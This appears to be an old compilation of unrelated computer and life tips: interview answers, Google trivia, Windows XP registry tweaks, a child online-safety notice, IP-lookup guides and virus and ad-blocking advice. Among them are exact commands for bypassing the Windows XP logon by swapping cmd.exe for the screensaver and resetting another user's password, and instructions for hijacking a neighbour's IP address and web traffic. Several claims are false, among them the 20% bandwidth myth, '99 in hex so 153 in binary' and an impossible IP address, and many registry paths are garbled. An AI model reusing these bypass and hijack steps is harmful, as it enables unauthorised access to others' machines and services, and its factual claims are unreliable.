6 Tricky Interview Questions:

1. Don't you think you are overqualified?

A- This is the time to answer a question with a question. Career counselor Monique LaCour of Career Management Services suggests responding, "Overqualified? Tell me what the fear is?" Wait briefly for an answer (usually there's not an adequate explanation) and then continue: "Quite frankly, I can do that job and then some. If the fear is that I am going to get bored, actually I am dedicated and I don't start a project that I don't complete. I am the person you can spread a little more thinly. You get more than your money's worth."

2. How do you explain the gap in your employment?

A-This is a no-brainer. Be truthful. "I was raising children," or "I took early retirement and now wish to work again."

3. Do you mind reporting to a boss who is 10 years younger than you?

A- "No, I respect competency and seniority and have no problem with that."

4. What's your biggest weakness?

A- "I work too hard and I'm too detail-oriented, but I work hard to control that."

5. If you could be an animal or a fruit or a car what would you choose?

A- While this may sound stupid, be prepared to give an answer that puts you in good light. Stay away from the fruit and the animals and go for the car, perhaps one that has a good record for safety, reliability, and versatility, or a sleek sports car with lots of zip and drive. Keep it short and simple—and smile.

6. Where do you want to be in five years?

A- "I'd like to be in a challenging position with this company, with more responsibility."

10 Things Which We Do Not Know About Google:

1. The name Google is a spelling error. The founders of the site, Larry page and Sergey Brin, thought they were going for 'Googol.' Googol is the mathematical term for 1 followed by 100 zeros. The term was coined by Milton Sirotta, nephew of American mathematician Edward Kasner, and was popularized in the book, Mathematics and the Imagination by Kasner and James Newman. Google's play on the term reflects the company's mission to organize the immense amount of information available on the web. Initially, Larry and Sergey Brin called their search engine BackRub, named for its analysis of the of the web's "back links." The search for a new name began in 1997, with Larry and his officemates starting a hunt for a number of possible new names for the rapidly improving search technology.

2. The reason the google page is so bare is because the founder didn't know HTML and just wanted a quick interface. Due to the sparseness of the homepage, in early user tests they noted people just kept sitting staring at the screen, waiting for the rest to appear. To solve the particular problem the Google Copyright message was inserted to act as an end of page marker.

3. Google started as a research project by Larry page and Sergey Brin when they were 24 and 23 years respectively. Google's mission statement is to organize the world's information and make it universally accessible and useful.

4. The company's first office was in a garage, in Menlo Park, California. Google's first employee was Craig Silverstein, now Google's director of technology. The basis of Google's search technology is called Page Rank that assigns an "importance" value to each page on the web and gives it a rank to determine how useful it is. However, that is not why it is called Page Rank. It is actually named after Google co-founder Larry Page.

5. Google receives about 20 million search queries each day from every part of the world, including Antarctica and Vatican. You can have the Google homepage set up in as many as 116 different languages -- including Urdu, Latin, Cambodia, Tonga, and Yoruba. In fact, Google has the largest network of translators in the world.

6. In the earliest stage of Google, there was no submit button, rather the Enter key needed to be pressed. Google has banned computer-generated search requests, which can sop up substantial system resources and help unscrupulous marketers manipulate its search rankings.

7. The Google's free web mail service Gmail was used internally for nearly two years prior to launch to the public. The researchers found out six types of email users, and Gmail has been designed to accommodate these six. The free e-mail service recently changed its name for new UK users. Following a trademark dispute with a London-based Independent International Investment Research, the mail account has been renamed Google Mail.

8. It would take 5,707 years for a person to search Google's 3 billion pages. The Google software does it in 0.5 seconds. Google Groups comprises more than 845 million Usenet messages which is the world's largest collection of messages or the equivalent of more than a terabyte of human conversation

9. The logos that appear on the Google homepage during noteworthy days and dates and important events are called Google Doodle. The company has also created an online museum where it has all the logos it has put on various occasions so far. Dennis Hwang, a Korean computer artist in the United States, is the guy behind these witty Doodles. Hwang has been drawing the face of Google for over two years.

10. You have heard of Google Earth, but not many know there is a site called Google Moon, which maps the Lunar surface. Google Moon is an extension of Google Maps and Google Earth that, courtesy of NASA imagery, enables you to surf the Moon's surface and check out the exact spots that the Apollo astronauts made their landings. Keyhole, the satellite imaging company that Google acquired in October 2004 was funded by CIA. Keyhole's technology runs Google's popular program Google Earth that allows users to quickly view stored satellite images from all around the world.

Speed Up Internet Explorer

1. Right-click on any shortcut you have to IE [You should create a shortcut out of your desktop IE icon, and delete the original icon]

2. Click Properties

3. Add ' -nohome' [with a space before the dash] after the end quotes in the Target field.

4. Click OK Fire up IE from your modified shortcut, and be amazed by how fast you are able to use IE!

Speed up your internet by 20%

Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc You can get it back: Click Start then Run and type "gpedit.msc" without quotes. This opens the group policy editor. Then go to: Local Computer Policy then Computer Configuration then Administrative Templates then Network then QOS Packet Scheduler and then to Limit Reservable Bandwidth Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab i.e."By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default." So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%.It works on Win 2000 as well.

INTERNET EXPLORER SPEED UP.

Edit your link to start Internet Explorer to have -nohome after it. For Example:"C:Program FilesInternet ExplorerIEXPLORE.EXE" -nohome This will load internet explorer very fast because it does not load a webpage while it is loading. If you want to go to your homepage after it is loaded, just click on the home button. or Open registry editor by going to Start then >> Run and entering >> regedit. Once in registry, navigate to key. HKEY_CURRENT_USERSoftware microsoftWindowsCurrentVe rsionInternetSettings. Right click @ windows right > New > DWORD. Type MaxConnectionsPerServer > You can set value (the more higher the no, the more good speed u get, e;g : 99). [99 in hex so 153 in binary] Create another DWORD >type

MaxConnectionsPer1_0Serve r. Then put a high value as mentioned above. Restart I.E and you are done.

SPEED UP BROWSING WITH DNS trick

when you connect to a web site your computer sends information back and forth, this is obvious. Some of this information deals with resolving the site name to an IP address, the stuff that tcp/ip really deals with, not words. This is DNS information and is used so that you will not need to ask for the site location each and every time you visit the site. Although WinXP and win2000 has a pretty efficient DNS cache, you can increase its overall performance by increasing its size. You can do this with the registry entries below: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServices DnscacheParameters] "CacheHashTableBucke tSize"=dword:0000000 1 "CacheHashTableSize& quot;=dword:00000180 "MaxCacheEntryTtlLim it"=dword:0000fa00 "MaxSOACacheEntryTtl Limit"=dword:0000012 d make a new text file and rename it to dnscache.reg. Then copy and paste the above into it and save it. Then merge it into the registry. SPEED UP WEB BROWSING. I've personally found a dramatic increase in web browsing after clearing the Windows XP DNS cache. To clear it type the following in a command prompt: ipconfig /flushdns.

ALLOW MORE THAN 2 SIMULTANEOUS DOWNLOADS ON IEXPLORER

This is to increase the number of max downloads to 10.

1. Start Registry Editor (Regedt32.exe).

2. Locate the following key in the registry: HKEY_CURRENT_USERSoftware MicrosoftWindowsCurrentVe rsionInternet Settings

3. On the Edit menu, click Add Value , and then add the following registry values: "MaxConnectionsPer1_ 0Server"=Dword:00000 00a "MaxConnectionsPerSe rver"=Dword:0000000a 4. Quit Registry Editor.

FIX IEXPLORER 6 SLOW PAGES LOADED

Here's an easier way to get to index.dat file as address in another tweak submitted here.

1. click on Internet Explorer

2. go to your root dir (usually C:)

3. open Documents and Settings folder

4. open "your username folder"

5. open User Data

6. **close IE if you have it open** rename index.dat to index.old logoff and log back on (don't need to restart) open up IE and go to a web page or site that always seemed to load slowly. It should load a lot more quickly now. NOTE. Always rename or backup .data or other system files before deleting. Disable Right Click!! [HKEY_CURRENT_USERSoftwar ePoliciesMicrosoftInterne t ExplorerRestrictions] "NoBrowserContextMen u"=dword:00000001 Enable Right Click!! [HKEY_CURRENT_USERSoftwar ePoliciesMicrosoftInterne t ExplorerRestrictions] "NoBrowserContextMen u"=dword:00000000 do u want to save entire Page For offline viewing?? Saving Web Pages with Internet Explorer 6.

Be Smart on The Internet and Be Safe on The Internet:

Hi People,

the Internet is a fun and kool place to chat and hang out with net friends and school mates. We all swap messages and photos and music files with our friends and internet buddies. Its a secret world away from adults and parents and nosey grown ups. Its a place where grown ups can't tell us what to do. but have you asked your self "Is the Internet a safe place?" the answer most of the times is "Yes" providing you know who the people are on your Chartroom and MSN buddy list. Most of the people will be from your own age group and they will like and share all the fun things you like and do. Your favorite Music and Pop Stars and Bands. Your favorite Film Stars. Your favorite Make-Up and Fashions and Clothes. We all like to chat and share our favorite things with our friends on the Internet. But is every one on My Friends list people I know ? Beware ! there are many people on the Internet who are evil, nasty and bad people who want to hurt you. They don't care about you. These people are not your Friends. Here is where you have to Be Smart on The Internet If you don't know the person on your chat buddy list.

1. Never tell them your real name or birthday.

2. Never tell them where you live or your home address.

3. Never tell them your home telephone number or your mobile fone number.

4. Never tell them the name of your school and how you travel to school.

5. Never tell them what times your parents or guardian are out of the house or go to work.

6. Never send them any photographs of you or your family and friends.

7. Never agree to meet them under any circumstance. Always remember these are nasty bad people and are older and clever than you. They are the same age as your parents or grandparents. They will pretend to be in your same age group.

They will pretend they go to your same school. They will also pretend to like the same music and pop bands as you and your friends.

They will pretend to like the same clothes and fashions as you. They will pretend to like the same games and toys as you. They will pretend to be the same religion as you. They will pretend to like the same foods as you. They will pretend to like the same television programs as you. They will tell you how much they like you and the things you do. They will pretend to understand all your troubles and problems. They will say how much they care about you.

They will say they want to help you with your home studies or schoolwork.

They will say they want to buy nice things for you. They will tell you they want to be your best friend. Don't believe anything they say. They will trick you into thinking they care about you with lies... if you have chatted with some one for a while, and you now think you like this person, but you have only recently met in a chartroom or MSN. But you are not sure if that person is your Friend but He/She has asked to meet up with you, remember.... don't let this person trick you.

1. Tell some one about this person, maybe to your school Teacher or to your Parents or to a Guardian or some one in your family like an Elder Brother or Sister or an Aunt or an Uncle.

2. Never agree to meet that person alone any where. Always take some one you know with you. If you can take an adult with you or a grown up relative or a brother or sister. If this is a good person, then they will not mind if you bring some one with you for safety. The Internet is a fun and kool place to chat and hang out with people of our own age group. But make sure you are smart and safe.

How Do I Find My PC's IP Address?

Follow these steps for Windows XP:

Click the Start button, select Run Type CMD and press Enter. A Command prompt window will open. Type ipconfig and press Enter. Several lines of information will be displayed. The IP address looks like "149.72.61.234" - yours will probably have different numbers near the end. If you cannot obtain the IP address, you can try to "renew" it: Click the Start button, select Run Type CMD and press Enter. A Command prompt window will open. Type ipconfig /release and press Enter.

(Note: there IS a space between ipconfig and /release) Wait for the command to finish. Type ipconfig /renew (Note: there is a space between ipconfig and /renew) Wait about 1 minute. If successful, your IP will display and look like "149.72.61.234". Type Exit to close the CMD window. If you get an error, the cause might be: You do not have a network connection. Your PC may not be configured to get its IP Address and DNS information from our DHCP server. In the Residences, you may not yet be authorized to access the network. You must wait at least 1 day after registering your PC at http://dormlord.dowling.edu before trying to connect. Changing IP Address Before you can change your IP you need some information. This information includes your IP range, subnet mask, default gateway, dhcp server, and dns servers. 1. Getting your IP range - Getting information about your IP range is not difficult, I recommend using Neo Trace on your own IP. But for my test just look at your IP address, say it's 24.193.110.13 you can definitely use the IP's found between 24.193.110.1 < [new IP] < 24.193.110.255, don't use x.x.x.1 or x.x.x.255. To find your IP simply open a dos/command prompt window and type ipconfig at the prompt, look for "IP Address. . . . . . . . . . . . : x.x.x.x". 2. Subnet Mask, Default Gateway, DHCP Server - These are very easy to find, just open a dos/command prompt window and type 'ipconfig /all' without the ' '.

You should see something like this: Windows IP Configuration: Host Name . . . . . . . . . . . . . . : My Computer Name Here Primary Dns Suffix . . . . . . . . . : Node Type . . . . . . . . . . . . . . Unknown IP Routing Enabled. . . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . . . . . . .: xxxx.xx.x Description . . . . . . . . . . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI) Physical Address. . . . . . . . . . . . . . . . . : XX-XX-XX-XX-XX-XX Dhcp Enabled. . . . . . . . . . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . . . . . . : Yes IP Address. . . . . . . . . . . . . . . . . . . . . : 24.xxx.xxx.xx Subnet Mask . . . . . . . . . . . . . . . . . . . .: 255.255.240.0 Default Gateway . . . . . . . . . . . . . . . . . : 24.xxx.xxx.x DHCP Server . . . . . . . . . . . . . . . . . . . .: 24.xx.xxx.xx DNS Servers . . . . . . . . . . . . . . . . . . . . : 24.xx.xxx.xxx 24.xx.xxx.xx 24.xx.xxx.xxx Lease Obtained. . . . . . . . . . . . . . . . . . .:Monday, January 20, 2003 4:44:08 PM Lease Expires . . . . . . . . . . . . . . . . . . . .:Tuesday, January 21, 2003

3:43:16 AM This is all the information you will need for now, I suggest you either keep your dos/command prompt window open or copy & paste the information somewhere, to copy right click the window and select text and click once. III. Changing your IP Address To change your IP address first pick any IP you like out of your IP range and remember it or write it down. It is usually a good idea to make sure the IP is dead (except for what we are going to do later on) so just ping it via "ping x.x.x.x" and if it times out then you can use it. Now go to My Computer, then Control Panel. In Control Panel select Network Connections and pick your active connection, probably Local Area Connection or your ISP name. Open that connection by double clicking on the icon in Network Connections, then select Properties under the General Tab. In the new window that pops up select Internet Protocol (TCP/IP) and click properties, it's under the general tab. In this new window select the General tab and choose "Use the following IP address" and for the IP address enter the IP you would like to use (the one you picked from your subnet earlier) and for the Subnet Mask enter the subnet mask you got when your ran ipconfig /all, same goes for the Default Gateway. Now select "Use the following DNS server addresses" and enter the information you got earlier. Now just click OK. Test that it worked, try to refresh a website and if it works you know everything is okay and you are connected. To make sure the change worked type ipconfig again and the IP address should have changed to your new one. IV. DoS Protection If your firewall shows that you are being DDoSed, this is usually when you are constantly getting attempted UDP connections several times a second from either the same IP address or multiple IP addresses (DDoS), you can protect your self by changing your IP address via the method I described above. V. Web servers & Other Services If you know someone on your IP range is running a web server and he or she has pissed you off or you just like messing around you can "steal" their IP address so any DNS going to that IP will show your site instead because you would be running a web server yourself. To "steal" an IP is to basically use the changing IP address method above and picking an IP that someone that is running a web server has in use. Often you will be able to keep that IP at least for some time, other times you wont be able to use it so just keep trying until it works. You your self will need to have a web server on the same port with your message. You can do this with other services too. You can also DoS or DDoS the IP address you are trying to steal to kick him off the net, but I don't recommend as its pretty illegal, an your ISP will get pissed. Finding IP Address of the sender in Yahoo Mail Log into your Yahoo! mail with your username and password.

Click on Inbox or whichever folder you have stored your mail. Open the mail. If you do not see the headers above the mail message, your headers are not displayed . To display the headers, Click on Options on the top-right corner In the Mail Options page, click on General Preferences Scroll down to Messages where you have the Headers option Make sure that Show all headers on incoming messages is selected Click on the Save button Go back to the mails and open that mail. You should see similar headers like this: Yahoo! headers : DAV*** Look for Received: from followed by the IP address between square brackets .

Here, it is 202.65.349.45. That is be the IP address of the sender. See IP of other while chatting Internet Protocol or IP is an address used by a person to connect to the internet. An IP address also mean the identity of the person in the World Wide Web. Internet Protocol also has the information of location where the person is stays and connects to internet. If the person who connects to internet doesn’t use proxy, we can track the location of her or his country by knowing his IP.

IP sometime can also track the city where the person location is. Because this article is discussing about find or get IP from yahoo messenger, I want to share my knowledge about getting or finding person location by using yahoo messenger. Sometime when we are chatting with a friend via Private Message or Instant Message (PM or IM), we curious where the place of our friend is. If you using official yahoo messenger it is an easiest way to find your friend IP address. Please read my tutorial below carefully and I guarantee you will be able to track and find the Internet Protocol of your friend. First step we must to do is get a PM or IM with your friend user name or id. Then try to send a file (picture, mp3, etc), then wait until your friend accepted your file and your file begin transferred to him. If your and your friend connection has a huge bandwidth, I suggest you, to send a bigger byte of file. You also don’t have to do this step if you have their web cam yahoo messenger.

After you done this thing, do the Next step below (you can do this step before send a file). Go to the command prompt application. If you don’t understand just follow this step (windows XP): Start >> Run >> cmd >> Enter Or Start >> Programs >> Accessories >> Command Prompt You will see a windows command prompt appear. Then write a command “netstat –n” or netstat –a” and press enter. Please note that the symbol “ not included when you type that command. You will see information under Active Connections list of Proto, Local Address, Foreign Address and State. Active Connections indicate the connections being connected to your computer. Proto show the protocol you use to. Local Address refers to Internet Protocol in you LAN connection. Foreign Address indicates the Internet Protocol connection that connect to you and the port they used. Now you just to seek a remote port that used by foreign address. Usually remote port 80 or 81 is used to transfer a file. Remote Port 5050 used for private message. And 5100 used for web cam. And remote Port 5000 or 5001 used for voice chat. The IP address of PM not the real IP of your friend.

It belongs to yahoo server IP. But if you send a file or receive a web cam you will be get a real IP of your friend address because yahoo use Peer to Peer connection to service this utility. Download Sharp IP Getter If you want a better way to get Internet Protocol of your friend, there are many software that designed and developed to get IP address. One of this software I ever tested and worked is Sharp IP Getter. We do not need to send a file or get a web cam to know the Internet Protocol of your friend. We only need have Private Message.

Sharp IP Getter developed by a team of Sharp Team. ou can also download this free software via this website www.Sharp-Soft.Net or www.Sharp-Zone.Com .

You can also get IP address from AIM or MSN with Aim ip getter and MSN IP Getter.

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly:

cd *drops to root
cdwindowssystem32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphacklogon.scr *backsup logon.scr
copy cmd.exe temphackcmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Frank and you want the password blah enter this "net user Frank blah" and this changes the password on franks machine to blah and your in.

Have fun

Lock Your Computer

Creating a desktop shortcut for locking your computer If you use your computer in an area where others may have access to it, and there are things on your system you would rather have kept confidential, locking your desktop when you leave the computer is an essential task. Here's a recipe for a desktop shortcut that will lock your computer in two easy clicks:

Right click on an empty area of the desktop and choose 'new' then 'shortcut.' The create shortcut wizard will open; in the first text box, type '%windir%System32rundll32 .exe user32.dll,LockWorkStation' and then give your shortcut an appropriate name on the next page, and hit 'finish.'

You will notice that the shortcut you created has a blank icon. To select a more appropriate one, right click on the shortcut and hit 'properties.' In the 'shortcut' tab, click the 'change icon' button.

In the 'look for icons in this file' box, type

'%SystemRoot%system32SHEL L32.dll'

then click 'ok' to see a range of icons for your new shortcut. Choose an appropriate icon. Your desktop locking shortcut is now ready for use. Test it out.

Note: It is useful if u have an account as it will prompt for a password. OR

Magic-2: Open your Microsoft Office Word, then write =rand(200,99) and then press Enter key. See what a magic .

Magic way to create the backup of installed system drivers.

To complete the all process, we will use a useful tool called DriverMax. Using this tool, you can easily export the backup of any specific or all drivers and then import it for reinstallation later or elsewhere. You can free download this tool for windows XP and Vista also (with free registration code). Download it and run the easy setup.

After Installation launch DriverMax, the first screen you will get with title "DriverMax" Version" and options "Export drivers, Import drivers and Installed drivers report". Just click on "Export Driver" option to start backup process.

Now after welcome screen, system will take few seconds to create the list of all installed drivers and then show you all installed drivers list.
Here you can select any specific device driver or click on "Select "button to create the backup of entire installed drivers.

Press the Next button and in next screen you can select the export type (simple backup or in zip format) and then choose the backup location (always choose drive other than C drive).

Again press the Next and system will take some time (depend upon the size of your drivers) to finish exporting the selected drivers.

Click the "Open extraction folder "button to view the backup files or press Close button to finish it. Now you can use this backup files (using import option) to restore drivers backup or move to any other computer. Copy the Following link to download it.

REMOVE ANNOYING DELETE CONFIRMATION MESSAGES

Although not strictly a performance tweak I love this fix as it makes my machine 'feel' faster. I hate the annoying 'are you sure?' messages that XP displays, especially if I have to use a laptop touchpad to close them. To remove these messages:

1. Right-click on the 'Recycle Bin' on the desktop and then click 'Properties'

2. Clear the 'Display Delete Confirmation Dialog' check box and click 'Ok' If you do accidently delete a file don't worry as all is not lost. Just go to your Recycle Bin and 'Restore' the file.

Manually register a file on my computer?

Files that are created as self-registering have information that need to be stored in the Windows registry in order for the file to be available and useable to applications on the machine. Usually DLLs, OCXs, and EXEs are self-registering and require to be registered on the machine. Follow these steps to register DLLs or OCXs:

On the Taskbar, select Start > Run. In the Open field, type regsvr32 "NameOfFile.extension", where is the directory where the file is located on your computer and NameOfFile.extension is the name of the file. For example: regsvr32 "C:WindowsSystem32My dll.dll" Press Enter. example : regsvr32 "C:WindowsSystem32Wa vefx32.dll". If the file registers successfully, the following message appears on the screen Follow these steps to register an executable, or .exe, file: On the Taskbar, select Start > Run. In the Open field, type "NameOfFile.exe" /REGSERVER, where is the directory where the file is located on your computer and NameOfFile.exe is the name of the file. For example: "C:Program FilesMisapplicationMyApp.exe" /REGSERVER Press Enter. Most executables do not display any message boxes when registered. It depends on how the application is created. Some applications when registered may open on your computer. An excellent notepad trick Open a blank notepad file * Write .LOG as the first line of the file, press enter * Save the file and close it * Double-click the file to open it and notice that notepad appends the current date and time to the end of the file and places the cursor on the line after. * Type your notes and then save and close the file. Each time you open the file, Notepad repeats the process, appending the time and date to the end of the file and placing the cursor below it. Folder Option Missing?? Many of us sometimes find the folder options missing in windows explorer. Here's the solution Open Run and then type "gpedit.msc". Now go to User Configuration > Administrative templates > Windows Component > Windows Explorer.

Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu" Hide the Partitions This trick is for all those people who want to hide tons of data into their box. So here it is, if you have very important data in your hard drive placed in some partition which you do not want anybody to access then this trick is only for you!

Just click on start>run type gpedit.msc, now navigate through user configuration> administrative templates > windows components> windows explorer, now double click on “Hide these specified drives in My Computer” modify it accordingly then just below you will find another option “Prevent access to drives from My Computer”, double click on this option and modify it accordingly. To make it visible again select "disable" by double clicking on the “Hide these specified drives in My Computer” option.

Fix ur virus problem

Adware/spyware scanners can dig up more harmful programs and services than you would imagine possible. They hide everywhere in your system, perpetrating malicious activity and siphoning your valuable system resources. A great program for detecint adware/spyware is Lavasoft Adware SE Professional. The second of defense against adware and spyware is Spybot Search and Destroy.

A good antivirus program that is also free of charge is Kaspersky. Check out the official sites for each of these programs, or go to Download.com or PCWorld.com.

Both sites offer an extensive collection of programs to download, usually for free. Here's a utility included with your Windows XP installation that will help you defend against viruses. It's called Data Execution Prevention. Highlight the Start Menu in the lower left-hand corner of your screen, and Right click My Computer. Choose Properties, and click the Advanced tab. Under Performance, click the Settings tab. Click the Data Execution Prevention tab. Click where it say -- Turn on DEP for all programs and services except those I select. I've noticed that, every now and then, Messenger and Tunnel are closed by this utility, so you might need to add your Yahoo! Messenger and Y!Tunnel programs to the exceptions list. This utility prevents programs and services from executing malicious code and spreading to infect your system.

Make sure there are no other exceptions. Now open your Internet Explorer, click the Tools tab, then choose Internet Options. Click the Security tab, then Custom Level. Click the Prompt option beneath Download unsigned ActiveX controls, and do the same for the Download signed ActiveX controls option.

Click Ok. Next, Click the Privacy tab under the Internet Options menu. Click Advanced, and put a check in the Override Automatic Cookie Handling box. Choose to block Third-party cookies, and Accept First-party cookies. Click Ok.

Under the Pop-up Blocker menu on the Privacy tab of Internet Options, and click settings. Make sure the Filter Level is set to Block All Pop-ups. Always click Apply to save your changes, and click Ok to finish up.

Now, your internet browser is not totally locked down against adware and spyware, but you have much more control over what is and is not added to your system. You might also look into alternate browser choices, such as Avant Browser or Mozilla Firefox. These excellent browsers help defend your system against adware/spyware by giving you more options and control over what is added or installed to your system.

You can also choose to disable pictures or flash animation to speed up your browsing speed. Run scans for Adware/Spyware/Viruses about once a week, and run a quick scan of your system32 folder fairly often to ensure that you aren't infected. You can check for some virus/Trojans not caught by anti-virus software by checking the registry manually, and here's a few common methods. Click the Start button, then Run. Type in regedit to bring up your system registry. Locate the following Key: HKEY_LOCAL_MACHINESOFTWAR EMicrosoftWindowsCurrentV ersionRun Notice what programs are listed to initialize when your system starts up. Check all the Run keys to make sure no alien programs have been added to your system startup. Go to Start, Run, and type in sysedit. 4 boxes should appear, two of which should be blank. Look for suspicious information in the System.ini box and the Win.ini box. Some viruses are known to hide here. Autoexec.bat Winstart.bat Win.ini System.ini The Startup folder (C:WINDOWSStart menuProgramsStartup) Find the files mentioned above and check them for suspicious activity. If you know you are infected, but your anti-virus software isn't able to locate or remove the infection, try this: Restart your computer in safe mode by pressing F8 during startup. Choose Safe Mode so that your system loads only what is absolutely necessary to function. If you know where the virus/Trojan is, delete the .exe file. Open the registry by using the regedit command, and locate the keys below: HKEY_LOCAL_MACHINESOFTWAR EMicrosoftWindowsCurrentV ersionRun HKEY_LOCAL_MACHINESOFTWAR EMicrosoftWindowsCurrentV ersionRunOnce HKEY_LOCAL_MACHINESOFTWAR EMicrosoftWindowsCurrentV ersionRunOnceEx HKEY_LOCAL_MACHINESOFTWAR EMicrosoftWindowsCurrentV ersionRunServices HKEY_LOCAL_MACHINESOFTWAR EMicrosoftWindowsCurrentV ersionRunServicesOnce HKEY_CURRENT_USERSoftware MicrosoftWindowsCurrentVe rsionRun HKEY_CURRENT_USERSoftware MicrosoftWindowsCurrentVe rsionRunonce If you locate a string that you think might be a virus, then place a : in from of the string. For example, if the string is "c:infection.exe", then change it to ":c:infection.exe". The colon negates the value and renders the virus mostly useless. If you are absolutely certain that this string is a virus, just delete it. Also, use your Task Manager, accessible by pressing ctrl+alt+delete, to see a list of services running on your computer. Click the processes tab and look for suspicious process names. If you find something that you are pretty sure is the virus, then right-click the process and end it. Also check the following keys in your registry to see if a Trojan might be running on your system: [HKEY_CLASSES_ROOTexefile shellopencommand]="& quot;%1" %*" [HKEY_CLASSES_ROOTcomfile shellopencommand]="& quot;%1" %*" [HKEY_CLASSES_ROOTbatfile shellopencommand]="& quot;%1" %*" [HKEY_CLASSES_ROOThtafile ShellOpenCommand]="& quot;%1" %*" [HKEY_CLASSES_ROOTpiffile shellopencommand]="& quot;%1" %*" [HKEY_LOCAL_MACHINESoftwa reCLASSESbatfileshellopen command] =""%1" %*" [HKEY_LOCAL_MACHINESoftwa reCLASSEScomfileshellopen command] =""%1" %*" [HKEY_LOCAL_MACHINESoftwa reCLASSESexefileshellopen command] =""%1" %*" [HKEY_LOCAL_MACHINESoftwa reCLASSEShtafileShellOpen Command] =""%1" %*" [HKEY_LOCAL_MACHINESoftwa reCLASSESpiffileshellopen command] =""%1" %*" If the keys listed above don't show the ""%1" %*" or are changed to ""server.exe %1" %*", then it is most likely telling a trojan to run at startup. Another good way to protect your PC from Trojans is to follow a few simple rules while browsing. Never download a program and open it without first scanning the file thoroughly with at least two antivirus programs. (I prefer Kaspersky and Nod) Never download an email attachment without submitting it to the same scrutiny. Trojans might even be bound (or attached) to picture files, so be extra careful when browsing that questionable site.

Also, try to locate a Malware Scanner such as A2 Trojan Scanner or a similar program.

Block Ad servers:::::

If you want to remove those nasty ads from the pages which waste lot of time and bandwidth then here is something for you I believe it will help you a lot

How it works ?

It's possible to set up a name server as authoritative for any domain you choose, allowing you to specify the DNS records for that domain. You can also configure most computers to be sort of mini-nameservers for themselves, so that they check their own DNS records before asking a nameserver. Either way, you get to say what hostname points to what IP address. If you haven't guessed already, the way you block ads it to provide bogus information about the domains we don't want to see - i.e., all those servers out there that dedicate their existence to spewing out banner ads.

The hosts file Probably the most common way people block ads like this is with something called the "hosts file". The hosts file is a simple list of hostnames and their corresponding IP addresses, which your computer looks at every time you try and contact a previously unknown hostname. If it finds an entry for the computer you're trying to reach, it sets the IP address for that computer to be whatever's in the hosts file. 127.0.0.1 is a special IP address which, to a computer, always means that computer. Any time a machine sends a network request to 127.0.0.1, it is talking to itself. This is very useful when it comes to blocking ads, because all we have to do is specify the IP address of any ad server to be 127.0.0.1. And to do that, all we have to do is edit the hosts file. What will happen then is something like this:

1. you visit a web page

2. the web page contains a banner ad stored on the server "ads.example.com"

3. your computer says "ads.example.com? never heard of it. wait a second, let's see if I've got the number on me..."

4. your computer finds its hosts file and checks to see if ads.example.com is listed

5. it finds the hostname, which points to 127.0.0.1

6. "great", says the computer, and sends off a request to 127.0.0.1 for the banner ad that's supposed to be on the page

7. "oh", says the computer, and fails to show anything because it just sent a request to itself for a banner ad

Where's my hosts file?

* Windows 95 / 98 / ME: C:Windows (I think)

* Windows NT: C:WinNThosts

* Windows 2000: C:WinNTsystem32driversetc

* Windows XP: C:WindowsSystem32driverse tc

* FreeBSD / Linux / Mac OS X / Unixish operating systems: /etc/hosts

* Classic Mac OS: please read this helpful information submitted by David "iNerd" B

* Mac OS 9: Marcia Skidmore sent in details that hopefully explain what you need to know

The format of the hosts file is very simple - IP address, whitespace, then a list of hostnames (except for older Macs; please see above). However, you don't need to know anything about the format if you don't want to as you can just view the list hosts file. Of course, that's not the only way to use the list, but it's probably the most simple for most people. here is the hosts list which are serving you the ads just append it to your hosts file and enjoy ad free surfing makes things faster. if you want ad from certain site then just remove it from the list below.

Top 5 Ways To Protect Yourself From Online Identity Theft

1. Identity theft is becoming a bigger problem as more and more people are making the internet a bigger part of their lives. People who are new to the online medium often fall prey to ‘phishing’ or other internet identity theft schemes. In many cases the ‘phishing party’ uses your credit card to order goods for them selves, in other cases they will apply for credit cards, set up bank accounts, and take advantage of your good credit rating. Correcting these issues involves a lot of time energy and stress, so here are ten tips to help you from becoming a victim of identity theft.

2. Use a disposable email account. Keep your business or personal email account just for business or personal communication. If you are going to be making purchases online, joining newsgroups, or subscribing to mailing lists and ezines use a disposable email account. There are many online free accounts such as yahoo, hotmail or grail, and most of them can interface with popular email clients like outlook or outlook express. Use one of them for all of your shopping transactions.

3. Disguise your online identity. If your real name in Mary Smith try to avoid using email accounts with name like msmith@example.com when dealing with people you don’t know and trust. If you were born in 1972 don’t chose

mikae1972@example.com as your email account.

4. Use different level passwords. Use one password for your personal information, use another for your business accounts and a third for your disposable email accounts or mailing lists you sign up for. Don’t use sequential passwords like password1 for personal use password2 for business, and password 3 for disposable accounts.

5. Use strong passwords. Don’t use your birthdates, year you were married, or your children’s birthdates. Avoid choosing passwords that consist entirely of letters or numbers. Also try to avoid using passwords that are actual words. The best passwords are mnemonic phrases like “my father ate three apples for breakfast”. Take the first letter of each word and convert the number into numbers and you end up with “mfa3a4b”.

Create An Ftp Server On Your Pc

Requirements:

· Serv -U

· No-IP.com Website

Step 1.

Getting a static IP address. Get a static address for your FTP server. You will want to do this as opposed to using your IP address for several reasons. First, it’s easier keeping up-to-date. Imagine having to change all of your setting every time your IP changed. With No-IP, the No-IP service runs in background on your computer and updates your current IP address with your FTP server’s URL (for example, you get ftp://rkchoolie.serveftp.com/). Second reason, you don’t want your IP address posted out there for everyone to see.

1. Go to http://www.no-ip.com/ to create a new user account.

2. Fill in the information that is required and the click Register button.

3. Your account has now been created and your account password has been emailed to you.

